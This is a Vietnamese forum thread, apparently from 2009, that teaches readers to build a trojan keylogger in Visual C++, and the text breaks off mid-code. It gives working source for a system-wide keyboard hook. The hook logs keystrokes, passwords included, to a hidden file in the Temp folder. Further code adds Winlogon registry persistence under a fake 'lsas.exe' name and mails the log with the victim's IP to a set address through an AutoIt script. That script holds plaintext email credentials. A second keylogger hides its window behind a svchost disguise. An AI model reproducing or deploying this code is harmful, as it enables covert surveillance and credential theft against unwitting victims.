Trang 1 trên tổng số 2 12 Cuối cùngCuối cùng
Từ 1 tới 10 trên tổng số 13 kết quả

Đề tài: Hướng Dẫn Lập Trình Trojan Trên VC++

 1. #1
  Ngày gia nhập
  02 2008
  Bài viết
  1,009

  Red face Hướng Dẫn Lập Trình Trojan Trên VC++

  Trojan là 1 phần mềm gián điệp dùng để theo dõi hoạt động của 1 người trên máy tính của họ
  Công cụ viết :

  1)VC++6.0 Tất nhiên là Visual C++ rồi,ở đây mình chọn VC++6.0 dơn giản gọn nhẹ rất thích hợp với những project Win32API thế này
  2)Virtual PC 2007 1 máy ảo để có thể kiểm tra được két quả của mình ở đây mình chọn phần mềm miễn phí
  3) MSDNcuốn từ điển quý giá cho những ai yêu thích lập trình windows MSDN bản mới nhất là bản 2008 nhé
  4) visual Assist công cụ hỗ trợ gõ code rất tốt

  Muốn viết trojan bắt buộc ta phải tìm hiểu về Hook,vậy Hook là gì???
  Trong Windows, khi chúng ta thực hiện các thao tác nhấp chuột, nhấn phím… thì hệ điều hành sẽ chuyển các sự kiện này thành các thông điệp (message) rồi đưa vào hàng đợi (queue) của hệ thống. Sau đó, các thông điệp được trao lại cho từng ứng dụng cụ thể để xử lý.

  Hook là một kỹ thuật cho phép một hàm có thể chặn, theo dõi, xử lý, hoặc hủy bỏ các thông điệp trước khi chúng “mò” đến được ứng dụng.
  Vậy ta cần Hook để làm gì??
  Chúng ta cần Hook để bắt các phím khi victim sử dụng chúng,và lưu lại trên 1 File ,và cuối cùng sử dụng phương thức gửi mail qua SMTP để gửi File đó đến ta
  bắt đầu Hook thôi
  Muốn làm trojan bắt buộc chúng ta sẽ phải Hook toàn cục hệ thống
  ở đây Mình chỉ xin bàn đến Hook bàn phím thôi nhé
  đầu tiên,để cài đặt Hook ta cần phải có hàm SetWindowsHookEx, CallNextHookEx, UnhookWindowsHookEx,và cuối cùng là 1 hàm CALLBACK dùng để lọc các thông tin nhận được từ các thông điệp

  hàm SetWindowsHookEx dùng để cài đặt Hook

  đọc ở ms-help://MS.MSDNQTR.v90.en/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookfunctions/setwindowshookex.htm trong CD MSDN

  Visual C++ Code:
  1. HHOOK SetWindowsHookEx(
  2.     int idHook,
  3.     HOOKPROC lpfn,
  4.     HINSTANCE hMod,
  5.     DWORD dwThreadId
  6. );
  Ý nghĩa từng tham số
  1) tham số int idHook
  Xác định loại hook mà ta muốn cài đặt, tham số này có thể là một trong các giá trị sau :

  • WH_CALLWNDPROC : đặt một thủ tục hook quản lý các thông điệp trước lúc hệ thống gởi chúng tới cửa sổ đích.

  • WH_CALLWNDPROCRET : đặt một thủ tục hook quản lý các thông điệp sau khi chúng được xử lý bởi thủ tục cửa sổ đích.

  • WH_CBT : đặt một thủ tục hook nhận những thông báo có ích tới ứng dụng huấn luyện trên cơ sở tính toán (CBT).

  • WH_DEBUG :đặt một thủ tục hook có ích cho việc debug những thủ tục hook khác.

  • WH_FOREGROUNDIDLE : đặt một thủ tục hook sẽ được gọi khi thread foreground của ứng dụng sẽ trở thành không dùng đến. Hook này có ích cho hoạt động những nhiệm vụ (task) độ ưu tiên thấp trong thời gian không được dùng đến.

  • WH_GETMESSAGE : đặt một thủ tục hook quản lý các thông điệp được post tới hàng đợi thông điệp.

  •WH_JOURNALPLAYBACK : đặt một thủ tục hook post những thông điệp được ghi trước đó bởi thủ tục hook WH_JOURNALRECORD.

  •WH_JOURNALRECORD : đặt một thủ tục hook ghi những thông điệp đầu vào được post tới hàng thông điệp hệ thống. Hook này có ích cho việc ghi các macro.

  • WH_KEYBOARD : đặt một thủ tục hook quản lý các thông điệp keystroke.

  • WH_MOUSE :đặt một thủ tục hook quản lý các thông điệp chuột.

  • WH_MSGFILTER: đặt một thủ tục hook quản lý các thông điệp được kết sinh như là một kết quả cuả sự kiện đầu vào ở trong dialog box, message box, menu hay scroll bar.

  • WH_SYSMSGFILTER : đặt một ứng dụng các thông điệp được kết sinh như là kết quả của một sự kiện đầu vào ở trong dialog box, message box, menu hay scroll bar. Thủ tục hook quản lý những thông điệp này cho tất cả các ứng dụng trong hệ thống.

  Do ta chỉ Hook bàn phím nên ta chọn • WH_KEYBOARD nhé

  2 ) tham số lpfn : Địa chỉ của Filter Function mà ta muốn gắn với hook.( các bạn gán tên của hàm lọc vào tham số này nhé )

  3) Tham số hMod : Handle của module chứa Filter Function. Nếu ta cài đặt một hook cục bộ (nghĩa là sự thực thi của Filter Function chỉ ảnh hưởng đối với tiến trình cài đặt hook), tham số này phải là NULL. Còn nếu chúng ta muốn có một hook với phạm vi toàn hệ thống (tức là mọi tiến trình đang hiện hữu đều chịu ảnh hưởng bởi Filter Function của chúng ta), tham số này sẽ là Handle của DLL chứa Filter Function.
  ở trong trường hợp này,có 2 cách để gọi đến handle của Hàm lọc
  cách thứ nhất là dùng GetModuleHandle để lấy địa chỉ của File DLL chứa hàm lọc
  với MFC ta có thể sử dụng hàm ::AfxGetInstanceHandle() để lấy handle của File chứa hàm lọc nhé

  4) Tham số dwThreadID : Định danh của thread ứng với hook đang được cài đặt . Nếu tham số này là một số khác 0, Filter Function được gắn với hook chỉ được gọi trong ngữ cảnh của một thread xác định. Còn nếu dwThreadID = 0, Filter Function sẽ có phạm vi toàn hệ thống, và dĩ nhiên, nó sẽ được gọi trong ngữ cảnh của bất kỳ thread nào đang tồn tại trên HĐH. Có thể sử dụng hàm GetCurrentThreadId để lấy được handle của thread muốn cài đặt hook.
  hàm CallNextHookEx để gọi đến hàm kế tiếp trong chuỗi các hàm Lọc
  Đọc thêm MSDN ở đây ms-help://MS.MSDNQTR.v90.en/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookfunctions/callnexthookex.htm
  Visual C++ Code:
  1. LRESULT CallNextHookEx(
  2.     HHOOK hhk,
  3.     int nCode,
  4.     WPARAM wParam,
  5.     LPARAM lParam
  6. );
  Với ý nghĩa từng tham số
  hhk : là handle của hook hiện hành, giá trị này có thể lấy được từ hàm SetWindowsHookEx khi cài đặt hook.

  nCode : chỉ định hook code để gởi đến hook kế tiếp. Hàm xử lý hook dùng giá trị này để chỉ định xử lý thông điệp được gởi từ hook như thế nào .

  wParam: chỉ định 16 bits thông tin mở rộng của thông điệp.

  lParam: chỉ định 32 bits thông tin mở rộng của thông điệp.

  Giá trị trả về : giá trị trả về là kết quả của quá trình xử lý và tùy thuộc vào thông số nCode

  Trong một số tình huống, Filter Function hiện hành có thể không muốn chuyển sự kiện cho Filter Function khác trong cùng một chuỗi. Lúc này, nếu loại hook chúng ta đang cài đặt cho phép huỷ bỏ sự kiện, và Filter Function của chúng ta cũng có cùng quyết định là hủy bỏ, nó sẽ không phải gọi hàm CallNextHookEx.

  Hàm lọc ( Filter Function ) để sử lý các thông tin bắt được
  Hàm lọc là hàm dùng để sử lý các sự kiện mà ta bắt được,vì lý do đó nên hàm lọc bắt buộc phải là hàm CALLBACK
  Bất kỳ 1 hàm lọc nào cũng phải tuan theo cú pháp sau:
  Visual C++ Code:
  1. LRESULT CALLBACK Tên_hàm_lọc(int nCode, WPARAM wParam, LPARAM lParam);
  Với tên_hàm_lọc là do bạn tùy chọn

  Ý nghĩa của từng tham số truyền cho hàm :

  nCode : tham số này thường được gọi là “hook code”, Filter Function sử dụng giá trị này để quyết định cách thức xử lý đối với sự kiện. Giá trị của hook code tùy thuộc vào từng loại hook cụ thể, và mỗi loại hook sẽ có tập hợp những giá trị hook code đặc trưng của riêng mình. Có một quy luật mà dường như các Filter Function của mọi loại hook cần tuân thủ : Khi Windows truyền cho hàm giá trị hook code âm, Filter Function không được xử lý sự kiện mà phải gọi hàm CallNextHookEx với chính những tham số mà hệ điều hành truyền cho nó. Sau đó, nó phải trả về giá trị được trả về bởi hàm CallNextHookEx.

  wParam, lParam: Đây là những thông tin cần thiết cho Filter Function trong quá trình xử lý sự kiện. Các giá trị này sẽ có ý nghĩa khác nhau tuỳ thuộc vào từng loại hook. Ví dụ , Filter Function gắn với hook WH_KEYBOARD sẽ nhận mã phím ảo (Virtual-Key Code) từ wParam, đồng thời có được từ lParam thông tin mô tả trạng thái của bàn phím khi sự kiện gõ phím xảy ra.

  còn tiếp
  Đã được chỉnh sửa lần cuối bởi AlexF : 17-01-2009 lúc 11:58 AM.

 2. #2
  Ngày gia nhập
  02 2008
  Bài viết
  1,009

  tiếp tục
  Hook Cục Bộ
  đầu tiên,mình giới thiệu 1 Hook cơ bản mà cả hàm lọc và hàm cài đặt Hook đều nằm trên cùng 1 File
  mở VC++6.0 ra,chọn Win32 console copy đoạn này
  Visual C++ Code:
  1. #include <windows.h>
  2. #include <stdio.h>
  3. #include <tchar.h>
  4. // ham loc cua Hook
  5. LRESULT CALLBACK LowLevelKeyboardProc( int nCode, WPARAM wParam, LPARAM lParam );
  6. int main()
  7. {
  8.     // lay dia chi Hook cho moi ung dung
  9.     HINSTANCE appInstance = GetModuleHandle(NULL);
  10.     // Set a global Windows Hook to capture keystrokes.
  11.     SetWindowsHookEx( WH_KEYBOARD, LowLevelKeyboardProc, appInstance, 0 );
  12.     /////////////////////nhan thong tin tu nguoi dung
  13.     MSG msg;
  14.     while(GetMessage(&msg, NULL, 0, 0) > 0)//vong lap nhan thong diep
  15.     {
  16.         TranslateMessage(&msg);
  17.         DispatchMessage(&msg);
  18.     }
  19.     return 0;
  20. }
  21. LRESULT CALLBACK LowLevelKeyboardProc( int nCode, WPARAM wParam, LPARAM lParam )
  22. {
  23.     if (((DWORD)lParam & 0x40000000) &&(HC_ACTION==nCode))  //khi ban an phim
  24.     {
  25.         printf("BAN DANG BI HOOK CUC BO BAN PHIM\n");
  26.     }
  27.     CallNextHookEx( NULL, nCode, wParam, lParam );  //call back tiep tuc
  28.     return 0;
  29. }

  đây là đoạn mã chúng ta sẽ Hook CỤC BỘ bàn phím ngay trên màn hình dos của chương trình
  như đã giới thiệu,hàm
  GetModuleHandle(NULL);
  dùng để lấy handle của File chứa hàm lọc,ta để NULL ở đây là để lấy chính File mà ta đang chạy
  Visual C++ Code:
  1. SetWindowsHookEx( WH_KEYBOARD, LowLevelKeyboardProc, appInstance, 0 );
  chúng ta chọn là Hook bàn phím vì thế ta phải chọn là WH_KEYBOARD
  còn LowLevelKeyboardProc là tên của hàm lọc

  appInstance chính là handle của File chứa hàm lọc
  tham số cuối cùng để 0 là để Hook ở mức hệ thống

  đến hàm lọc
  Visual C++ Code:
  1. LRESULT CALLBACK LowLevelKeyboardProc( int nCode, WPARAM wParam, LPARAM lParam )
  2. {
  3.     if (((DWORD)lParam & 0x40000000) &&(HC_ACTION==nCode))  //khi ban an phim
  4.     {
  5.         printf("BAN DANG BI HOOK CUC BO BAN PHIM\n");
  6.     }
  7.     CallNextHookEx( NULL, nCode, wParam, lParam );  //call back tiep tuc
  8.     return 0;
  9. }


  ta chỉ đơn giản là khi người dùng bấm phím là in ra màn hình câu bạn đang bị hook,vì thế ta gần như không phải lọc sự kiện gì,chỉ cần bấm phím là printf thoai
  Visual C++ Code:
  1.     if (((DWORD)lParam & 0x40000000) &&(HC_ACTION==nCode))  //khi ban an phim
  2.     {
  3.         printf("BAN DANG BI HOOK CUC BO BAN PHIM\n");
  4.     }
  tiếp tục
  hàm
  CallNextHookEx( NULL, nCode, wParam, lParam ); //call back tiep tuc
  phải nằm trong hàm lọc để duy trì sự kiện 1 cách liên tục

  còn tiếp
  Đã được chỉnh sửa lần cuối bởi AlexF : 14-01-2009 lúc 09:48 PM.

 3. #3
  Ngày gia nhập
  02 2008
  Bài viết
  1,009

  Hook toàn cục
  Muốn Hook toàn cục ta chia ra làm 2 File,1 File DLL chứa hàm lọc và được export ra,1 File exe chứa hàm cài đặt Hook và import hàm lọc
  [PHP]trước hết các bạn cần biết cách tạo 1 File DLL,nếu chưa biết có thể đọc hướng dẫn thêm tại đây Cách tạo thư viện DLL trong VC++ 6.0
  File DLL có tên là DLL.dll nhé
  Visual C++ Code:
  1. #include <windows.h>
  2. #include <fstream>
  3. using namespace std;
  4.  
  5. #ifdef _DEBUG
  6. #define new DEBUG_NEW
  7. #undef THIS_FILE
  8. static char THIS_FILE[] = __FILE__;
  9. #endif
  10.  
  11.  
  12. #pragma data_seg(".SHARDAT")
  13.  
  14. char *SaveFile()
  15. {
  16.     char s[255];
  17.     static char pth[255];
  18.     GetTempPath(255,pth);
  19.     lstrcpy(s,"keylog.txt");
  20.     lstrcat(pth,s);
  21.     return pth;
  22. }
  23.  
  24. //Mo File
  25. fstream File;//khai bao File
  26. LRESULT _stdcall CALLBACK LowLevelKeyboardProc( int nCode, WPARAM wParam, LPARAM lParam )
  27. {
  28.     char ch,chuoi[20];
  29.     if (((DWORD)lParam & 0x40000000) &&(HC_ACTION==nCode))  //neu ban an phim
  30.     {
  31.         if ((wParam==VK_LEFT )|| (wParam==VK_HOME )|| (wParam==VK_END )||(wParam==VK_NEXT )||(wParam==VK_UP)|| (wParam==VK_RIGHT)||(wParam==VK_DOWN)||(wParam==VK_DELETE)||(wParam==VK_LBUTTON)||(wParam==VK_RBUTTON )||(wParam==VK_MENU)||(wParam==VK_CANCEL )||(wParam==VK_CONTROL)||(wParam==VK_SHIFT)||(wParam==VK_SPACE)||(wParam==VK_RETURN)||((wParam>=0x2f ) &&(wParam<=0x100))||(wParam==VK_TAB)||(wParam==VK_CLEAR)||(wParam==VK_BACK))
  32.         // ghi chu VK_RETURN : ENTER , VK_TAB : tab ,day la ma phim ao chi tiet doc
  33.          // ms-help://MS.MSDNQTR.v90.en/winui/winui/WindowsUserInterface/UserInput/VirtualKeyCodes.htm
  34.         {
  35.             File.open(SaveFile(),ios::out|ios::app);
  36.             if (wParam==VK_RETURN)  //neu la phim Enter thi xuong dong
  37.             {
  38.                  ch = '\n';//gan ky tu xuong dong
  39.                  File.write(&ch,sizeof(ch)); //ghi ra
  40.             }
  41.             else if (wParam==VK_TAB)  //neu la dau TAB
  42.             {
  43.                 lstrcpy(chuoi,"{TAB}");
  44.                 File<<chuoi;  //ghi ra nit TAB de Biet khi danh password :D
  45.             }  
  46.             else if (wParam==VK_CLEAR)
  47.             {
  48.                 lstrcpy(chuoi,"{CLEAR}");
  49.                 File<<chuoi;
  50.             }
  51.             else if (wParam==VK_BACK)
  52.             {  
  53.                 lstrcpy(chuoi,"{BACK}");  //neu xoa thi bao 1 tieng,de phong luc danh password sai ho danh lai
  54.                 File<<chuoi;
  55.             }
  56.             else if(wParam==VK_SPACE)
  57.             {
  58.                 lstrcpy(chuoi," ");  // nut cach
  59.                 File<<chuoi;
  60.             }
  61.             else if (wParam==VK_SHIFT)
  62.             {
  63.                 lstrcpy(chuoi,"{SHIFT}");  // shift
  64.                 File<<chuoi;
  65.             }
  66.             else if (wParam==VK_CONTROL)
  67.             {
  68.                 lstrcpy(chuoi,"{CONTROL}");  // nut control
  69.                 File<<chuoi;
  70.             }
  71.             else if (wParam==VK_LEFT )
  72.             {
  73.                 lstrcpy(chuoi,"{<-}");  // nut sang trai
  74.                 File<<chuoi;
  75.             }
  76.             else if (wParam==VK_HOME  )
  77.             {
  78.                 lstrcpy(chuoi,"{Home}");  // nut Home
  79.                 File<<chuoi;
  80.             }
  81.             else if (wParam==VK_END )
  82.             {
  83.                 lstrcpy(chuoi,"{END}");  //
  84.                 File<<chuoi;
  85.             }
  86.             else if ((wParam==VK_NEXT ))
  87.             {
  88.                 lstrcpy(chuoi,"{PAGEDOWN}");  //
  89.                 File<<chuoi;
  90.             }
  91.             else if ((wParam==VK_UP) )
  92.             {
  93.                 lstrcpy(chuoi,"{MuiTenXuong}");  //
  94.                 File<<chuoi;
  95.             }
  96.             else if ((wParam==VK_RIGHT))
  97.             {
  98.                 lstrcpy(chuoi,"{->}");  //
  99.                 File<<chuoi;
  100.             }
  101.             else if ((wParam==VK_DOWN))
  102.             {
  103.                 lstrcpy(chuoi,"{MuiTenXuong}");  //
  104.                 File<<chuoi;
  105.             }
  106.             else if ((wParam==VK_DELETE))
  107.             {
  108.                 lstrcpy(chuoi,"{Delete}");  //
  109.                 File<<chuoi;
  110.             }
  111.             else if ((wParam==VK_LBUTTON))
  112.             {
  113.                 lstrcpy(chuoi,"{ChuotTrai}");  //
  114.                 File<<chuoi;
  115.             }
  116.             else if ((wParam==VK_RBUTTON ))
  117.             {
  118.                 lstrcpy(chuoi,"{ChuotPhai}");  //
  119.                 File<<chuoi;
  120.             }
  121.             else if ((wParam==VK_MENU))
  122.             {
  123.                 lstrcpy(chuoi,"{ALT}");  //
  124.                 File<<chuoi;
  125.             }
  126.             else if ((wParam==VK_CANCEL ))
  127.             {
  128.                 lstrcpy(chuoi,"{Break}");  //
  129.                 File<<chuoi;
  130.             }
  131.             else if(wParam>=0x30&&wParam<= 0x5A)  //neu la cac nut tu 0 --> 9 hoac tu a -> Z
  132.             {
  133.                  BYTE ks[256];  
  134.                  GetKeyboardState(ks);  //lay ma Nut bamso
  135.                  WORD w;
  136.                  UINT scan;
  137.                  scan=0;
  138.                  ToAscii(wParam,scan,ks,&w,0);  //chuyen ma nut bam ra ma Ascii
  139.                  ch = char(w);
  140.                  File.write(&ch,sizeof(ch));//ghi ra File cac chu cai tim duoc
  141.             }
  142.             //khong ghi lai cac nut khac khong lien quan den viec danh password
  143.             File.close();//dong File,tiep tuc chu trinh( moi khi bam 1 phim lai mo File )
  144.         }
  145.     }
  146.     LRESULT RetVal = CallNextHookEx( NULL, nCode, wParam, lParam );  //call back tiep tuc
  147.     return RetVal;
  148. }

  hàm SaveFile() là để mình lấy đường dẫn là File Temp của windows,Folder này nổi tiếng lắm File linh tinh nên mình cho trojan vào đây cho nạn nhân khó tìm
  Visual C++ Code:
  1. char *SaveFile()
  2. {
  3.     char s[255];
  4.     static char pth[255];
  5.     GetTempPath(255,pth);
  6.     lstrcpy(s,"keylog.txt");
  7.     lstrcat(pth,s);
  8.     return pth;
  9. }

  Mình lưu keylog.txt vào File Temp đó

  tiếp đến là hàm Lọc,hàm lọc mình sử lý việc gõ bàn phím,cứ gõ phím nào mình lập tức chuyển nó sang kiểu ký tự và ghi ra File ở đây xin mọi người chú ý cho là mình chỉ lọc những phím quan trọng cho soạn thảo văn bản và gõ password thôi nên không thể sử dụng hàm GetkeyNameText được mà phải sử dụng hàm GetKeyboardState để thu nhận từng ma phím ảo của phím


  Visual C++ Code:
  1.             else if(wParam>=0x30&&wParam<= 0x5A)  //neu la cac nut tu 0 --> 9 hoac tu a -> Z
  2.             {
  3.                  BYTE ks[256];  
  4.                  GetKeyboardState(ks);  //lay ma Nut bamso
  5.                  WORD w;
  6.                  UINT scan;
  7.                  scan=0;
  8.                  ToAscii(wParam,scan,ks,&w,0);  //chuyen ma nut bam ra ma Ascii
  9.                  ch = char(w);
  10.                  File.write(&ch,sizeof(ch));//ghi ra File cac chu cai tim duoc
  11.             }

  nếu là các ký tự từ A--> z và 0-->9 trên bàn phím thì ta ghi trực tiếp ra

  File chứa hàm cài đặt Hook
  File này phải gọi hàm LowLevelKeyboardProc trong thư viện DLL.dll
  Visual C++ Code:
  1. #include <windows.h>
  2. #include<fstream>
  3. using namespace std;
  4.  
  5. char *SaveFile()
  6. {
  7.     char s[255];
  8.     static char pth[255];
  9.     GetTempPath(255,pth);
  10.     lstrcpy(s,"keylog.txt");
  11.     lstrcat(pth,s);
  12.     return pth;
  13. }
  14.  
  15. // ham loc cua Hook
  16. int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd )
  17. {
  18.     // lay dia chi Hook cho moi ung dung
  19.     typedef LRESULT (CALLBACK *controdiachi)(int, WPARAM,LPARAM);
  20.     HINSTANCE thuvien;
  21.     thuvien = LoadLibrary("DLL.dll");
  22.     controdiachi LowLevelKeyboardProc;
  23.     if (thuvien == NULL)
  24.     {
  25.         return 0;
  26.     }
  27.    
  28.     LowLevelKeyboardProc = (controdiachi)GetProcAddress(thuvien, "LowLevelKeyboardProc");
  29.     if (LowLevelKeyboardProc == NULL)
  30.     {
  31.         return 0;
  32.     }
  33.          /////////////  xoa sach File cu di de viet File moi vao
  34.     fstream File;
  35.      File.open(SaveFile(),ios::out);
  36.      File.close(); 
  37.      ////////////////////////////sau khi xoa xong thi dong FIle lai
  38.     HMODULE appInstance = GetModuleHandle("DLL.DLL");
  39.                     // Set a global Windows Hook to capture keystrokes
  40.     SetWindowsHookEx( WH_KEYBOARD, LowLevelKeyboardProc, appInstance, 0 );
  41.     /////////////////////nhan thong tin tu nguoi dung
  42.     MSG msg;//
  43.     while(GetMessage(&msg, NULL, 0, 0) != FALSE)
  44.     {
  45.         TranslateMessage(&msg);
  46.         DispatchMessage(&msg);
  47.     }
  48.     FreeLibrary(thuvien);
  49.     return 0;
  50. }

  tiếp theo là phần khởi động lại cùng máy tính
  mình cung cấp đoạn code này để Trojan có thể khởi động lại cùng máy tính,chỉ việc copy hàm này vào và gọi nó là được
  Visual C++ Code:
  1. void khoidong()
  2. {
  3.         HKEY hkey;
  4.         RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",0,KEY_ALL_ACCESS,&hkey);
  5.         RegSetValueEx(hkey,"System",NULL,REG_SZ,(unsigned char*)"C:\\WINDOWS\\system32\\lsas.exe",strlen("C:\\WINDOWS\\system32\\lsas.exe")+1);
  6.         RegCloseKey(hkey);
  7. }

  với File cần khởi động lại có tên là C:\\WINDOWS\\system32\\lsas.exe--> đây sẽ là tên con trojan của ta nhé


  rất tiếc là tại thời điểm hiện tại mình chưa gửi Mail bằng VC++ được,chỉ có thể dùng tạm ngu kiến AutoIT để làm việc này,nếu ai quan tâm thì có thể xem code
  AutoIT Code:
  1. #Include<file.au3>
  2. #include <Inet.au3>
  3. $PublicIP = _GetIP()  ; lay dia chi IP cua ban
  4. Global $oMyError = ObjEvent("AutoIt.Error", "MyErrFunc")
  5. ;##################################
  6. ; Include
  7. ;##################################
  8. #Include<file.au3>
  9. #Include<array.au3>
  10. ;##################################
  11. ; Variables
  12. ;##################################
  13. Dim $array
  14. $s_SmtpServer = "smtp.gmail.com"                             ; dia chi SMTP
  15. $s_FromName = "virusbom12"                           ; ten cua Nick tren dia chi ( lay FistName neu la Gmail.com
  16. $s_FromAddress = "virusbom12@gmail.com"                 ;  day la dia chi mail Nguoi Gui
  17. $s_ToAddress = "lai_tathieu@yahoo.com"           ; dia chi Mail nguoi nhan
  18. $s_Subject = @ComputerName                                      ; tieu de cua Mail ,o da minh lay la ten may tinh
  19. $as_Body = "dia chi IP Hien Tai Cua May Tinh Co Ten " &@ComputerName & " LA: "& $PublicIP                 ; day la noi dung Text cua Main ,o day minh lay la ten may tinh va dia chi IP cua ban
  20. $array = "C:\csb.txt"  ; cai nay anh em de gui file nhe
  21. $s_CcAddress = ""                    ; address for cc - leave blank if not needed
  22. $s_BccAddress = ""                   ; address for bcc - leave blank if not needed
  23. $s_Username = "virusbom12@gmail.com"                        ; danh lai dia chi  mail gui cua ban ( neu la Gmail)
  24. $s_Password = "virusvn1989"                           ; danh password mail gui cua ban( de tu dong gui mail ma
  25. $IPPort = 465                                       ; port 465 cua Gmail
  26. $ssl = 1                                                          ;
  27.  
  28. ;##################################
  29. ; Script
  30. ;##################################
  31. Global $oMyRet[2]
  32. Global $oMyError = ObjEvent("AutoIt.Error", "MyErrFunc")
  33.  
  34. ; day la ham Gui Mail _INetSmtpMailCom
  35. $rc = _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject, $as_Body, $array, $s_CcAddress, $s_BccAddress, $s_Username, $s_Password, $IPPort, $ssl)
  36.     MsgBox(0, "Error sending message", "Error code:" & @error & "  Description:" & $rc)
  37. ;
  38.  
  39. Func _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject = "", $as_Body = "", $array = "", $s_CcAddress = "", $s_BccAddress = "", $s_Username = "", $s_Password = "",$IPPort=25, $ssl=0)
  40.     $objEmail = ObjCreate("CDO.Message")
  41.     $objEmail.From = '"' & $s_FromName & '" <' & $s_FromAddress & '>'
  42.     $objEmail.To = $s_ToAddress
  43.     Local $i_Error = 0
  44.     Local $i_Error_desciption = ""
  45.     If $s_CcAddress <> "" Then $objEmail.Cc = $s_CcAddress
  46.     If $s_BccAddress <> "" Then $objEmail.Bcc = $s_BccAddress
  47.     $objEmail.Subject = $s_Subject
  48.     If StringInStr($as_Body,"<") and StringInStr($as_Body,">") Then
  49.         $objEmail.HTMLBody = $as_Body
  50.     Else
  51.         $objEmail.Textbody = $as_Body & @CRLF
  52.     EndIf
  53.     If $array <> "" Then
  54.         ;Local $array = StringSplit($array, ";")
  55.             $array= _PathFull ($array)
  56.             If FileExists($array) Then
  57.                 $objEmail.AddAttachment ($array)
  58.             Else
  59.                 $i_Error_desciption = $i_Error_desciption & @lf & 'File not found to attach: ' & $array
  60.                 SetError(1)
  61.                 return 0
  62.             EndIf
  63.     EndIf
  64.     $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
  65.     $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = $s_SmtpServer
  66.     $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = $IPPort
  67. ;Authenticated SMTP
  68.     If $s_Username <> "" Then
  69.         $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
  70.         $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusername") = $s_Username
  71.         $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = $s_Password
  72.     EndIf
  73.     If $Ssl Then
  74.         $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
  75.     EndIf
  76. ;Update settings
  77.     $objEmail.Configuration.Fields.Update
  78. ; Sent the Message
  79.     $objEmail.Send
  80.     if @error then
  81.         SetError(2)
  82.         return $oMyRet[1]
  83.     EndIf
  84. EndFunc ;==>_INetSmtpMailCom
  85. ;
  86. ;
  87. ; Com Error Handler
  88. Func MyErrFunc()
  89.     $HexNumber = Hex($oMyError.number, 8)
  90.     $oMyRet[0] = $HexNumber
  91.     $oMyRet[1] = StringStripWS($oMyError.description,3)
  92.     ConsoleWrite("### COM Error !  Number: " & $HexNumber & "   ScriptLine: " & $oMyError.scriptline & "   Description:" & $oMyRet[1] & @LF)
  93.     SetError(1); something to check for when this function returns
  94.     Return
  95. EndFunc ;==>MyErrFunc
  Đã được chỉnh sửa lần cuối bởi AlexF : 02-02-2009 lúc 10:32 PM.

 4. #4
  Ngày gia nhập
  02 2008
  Bài viết
  1,009

  các bạn cũng có thể Làm được keylog mà không cần phải biết đến kỹ thuật Hook ^^!, nhưng nếu học xong C mà không biết Hook thì .... hơi phí hơn nữa,sử dụng kỹ thuật Hook giúp ta tiếc kiệm bộ nhớ hơn là phương pháp liên tục kiểm tra bằng vòng lặp vô cùng

  Phương pháp Kiểm tra bàn phím bằng vòng lặp vô cùng

  Visual C++ Code:
  1. #include <windows.h>
  2. #include <stdio.h>
  3. #include <winuser.h>
  4. #include <windowsx.h>
  5.  
  6. #define BUFSIZE 80
  7.  
  8. int test_key(void);
  9. int create_key(char *);
  10. int get_keys(void);
  11.  
  12.  
  13. int main(void)
  14. {
  15.     HWND stealth;
  16.     AllocConsole();
  17.     stealth=FindWindowA("ConsoleWindowClass",NULL);
  18.     ShowWindow(stealth,0);
  19.  
  20.     int test,create;
  21.     test=test_key();
  22.  
  23.     if (test==2)
  24.     {
  25.         char *path="c:\\%windir%\\svchost.exe";
  26.         create=create_key(path);
  27.  
  28.     }
  29.  
  30.  
  31.     int t=get_keys();
  32.  
  33.     return t;
  34. }  
  35.  
  36. int get_keys(void)
  37. {
  38.     short character;
  39.     while(1)
  40.     {
  41.         Sleep(10);//tiec kiem CPU
  42.         for(character=8;character<=222;character++)
  43.         {
  44.             if(GetAsyncKeyState(character)==-32767)
  45.             {  
  46.  
  47.                 FILE *file;
  48.                 file=fopen("svchost.log","a+");
  49.                 if(file==NULL)
  50.                 {
  51.                     return 1;
  52.                 }            
  53.                 if(file!=NULL)
  54.                 {        
  55.                     if((character>=39)&&(character<=64))
  56.                     {
  57.                         fputc(character,file);
  58.                         fclose(file);
  59.                         break;
  60.                     }        
  61.                     else if((character>64)&&(character<91))
  62.                     {
  63.                         character+=32;
  64.                         fputc(character,file);
  65.                         fclose(file);
  66.                         break;
  67.                     }
  68.                     else
  69.                     {
  70.                         switch(character)
  71.                         {
  72.                         case VK_SPACE:
  73.                             fputc(' ',file);
  74.                             fclose(file);
  75.                             break;    
  76.                         case VK_SHIFT:
  77.                             fputs("[SHIFT]",file);
  78.                             fclose(file);
  79.                             break;                                            
  80.                         case VK_RETURN:
  81.                             fputs("\n[ENTER]",file);
  82.                             fclose(file);
  83.                             break;
  84.                         case VK_BACK:
  85.                             fputs("[BACKSPACE]",file);
  86.                             fclose(file);
  87.                             break;
  88.                         case VK_TAB:
  89.                             fputs("[TAB]",file);
  90.                             fclose(file);
  91.                             break;
  92.                         case VK_CONTROL:
  93.                             fputs("[CTRL]",file);
  94.                             fclose(file);
  95.                             break;    
  96.                         case VK_DELETE:
  97.                             fputs("[DEL]",file);
  98.                             fclose(file);
  99.                             break;
  100.  
  101.                             /*case VK_OEM_PLUS:
  102.                             fputc('+',file);
  103.                             fclose(file);
  104.                             break;
  105.                             case VK_OEM_COMMA:
  106.                             fputc(',',file);
  107.                             fclose(file);
  108.                             break;
  109.                             case VK_OEM_MINUS:
  110.                             fputc('-',file);
  111.                             fclose(file);
